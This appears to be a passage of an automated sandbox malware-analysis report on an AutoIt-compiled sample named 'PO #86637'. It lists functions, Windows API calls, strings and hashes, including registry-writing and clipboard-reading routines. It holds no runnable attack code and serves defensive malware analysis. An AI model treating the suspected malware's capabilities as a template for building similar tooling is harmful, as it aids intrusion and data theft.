                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                      Function 00412216 Relevance: .3, Instructions: 332COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                      Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(?), ref: 0045953B
                      • DeleteObject.GDI32(?), ref: 00459551
                      • DestroyWindow.USER32(?), ref: 00459563
                      • GetDesktopWindow.USER32 ref: 00459581
                      • GetWindowRect.USER32(00000000), ref: 00459588
                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                      • ShowWindow.USER32(?,00000004), ref: 00459865
                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                      • GetStockObject.GDI32(00000011), ref: 004598CD
                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                      • DeleteDC.GDI32(00000000), ref: 004598F8
                      • _wcslen.LIBCMT ref: 00459916
                      • _wcscpy.LIBCMT ref: 0045993A
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                      • GetDC.USER32(00000000), ref: 004599FC
                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                      • String ID: $AutoIt v3$DISPLAY$static
                      • API String ID: 4040870279-2373415609
                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                      Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000012), ref: 0044181E
                      • SetTextColor.GDI32(?,?), ref: 00441826
                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                      • GetSysColor.USER32(0000000F), ref: 00441849
                      • SetBkColor.GDI32(?,?), ref: 00441864
                      • SelectObject.GDI32(?,?), ref: 00441874
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                      • GetSysColor.USER32(00000010), ref: 004418B2
                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                      • DeleteObject.GDI32(?), ref: 004418D5
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                      • FillRect.USER32(?,?,?), ref: 00441970
                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                      • String ID:
                      • API String ID: 69173610-0
                      • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                      • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                      Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?), ref: 004590F2
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                      • GetStockObject.GDI32(00000011), ref: 004592AC
                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                      • DeleteDC.GDI32(00000000), ref: 004592D6
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                      • GetStockObject.GDI32(00000011), ref: 004593D3
                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                      Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-3360698832
                      • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                      • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                      Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                      Download Yara Rule
                      APIs
                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                      • SetCursor.USER32(00000000), ref: 0043075B
                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                      • SetCursor.USER32(00000000), ref: 00430773
                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                      • SetCursor.USER32(00000000), ref: 0043078B
                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                      • SetCursor.USER32(00000000), ref: 004307A3
                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                      • SetCursor.USER32(00000000), ref: 004307BB
                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                      • SetCursor.USER32(00000000), ref: 004307D3
                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                      • SetCursor.USER32(00000000), ref: 004307EB
                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                      • SetCursor.USER32(00000000), ref: 00430803
                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                      • SetCursor.USER32(00000000), ref: 0043081B
                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                      • SetCursor.USER32(00000000), ref: 00430833
                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                      • SetCursor.USER32(00000000), ref: 0043084B
                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                      • SetCursor.USER32(00000000), ref: 00430863
                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                      • SetCursor.USER32(00000000), ref: 0043087B
                      • SetCursor.USER32(00000000), ref: 00430887
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                      • SetCursor.USER32(00000000), ref: 0043089F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Cursor$Load
                      • String ID:
                      • API String ID: 1675784387-0
                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                      Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(0000000E), ref: 00430913
                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                      • GetSysColor.USER32(00000012), ref: 00430933
                      • SetTextColor.GDI32(?,?), ref: 0043093B
                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                      • GetSysColor.USER32(0000000F), ref: 00430959
                      • CreateSolidBrush.GDI32(?), ref: 00430962
                      • GetSysColor.USER32(00000011), ref: 00430979
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                      • SetBkColor.GDI32(?,?), ref: 004309A6
                      • SelectObject.GDI32(?,?), ref: 004309B4
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                      • GetSysColor.USER32(00000011), ref: 00430A9F
                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                      • SelectObject.GDI32(?,?), ref: 00430AD0
                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                      • SelectObject.GDI32(?,?), ref: 00430AE3
                      • DeleteObject.GDI32(?), ref: 00430AE9
                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1582027408-0
                      • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                      • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                      Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseConnectCreateRegistry
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 3217815495-966354055
                      • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                      • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                      Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 004566AE
                      • GetDesktopWindow.USER32 ref: 004566C3
                      • GetWindowRect.USER32(00000000), ref: 004566CA
                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                      • DestroyWindow.USER32(?), ref: 00456746
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                      • IsWindowVisible.USER32(?), ref: 0045682C
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                      • GetWindowRect.USER32(?,?), ref: 00456873
                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                      • CopyRect.USER32(?,?), ref: 004568BE
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                      • String ID: ($,$tooltips_class32
                      • API String ID: 225202481-3320066284
                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                      Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                      Download Yara Rule
                      APIs
                      • OpenClipboard.USER32(?), ref: 0046DCE7
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                      • CloseClipboard.USER32 ref: 0046DD0D
                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                      • CloseClipboard.USER32 ref: 0046DD41
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                      • CloseClipboard.USER32 ref: 0046DD99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
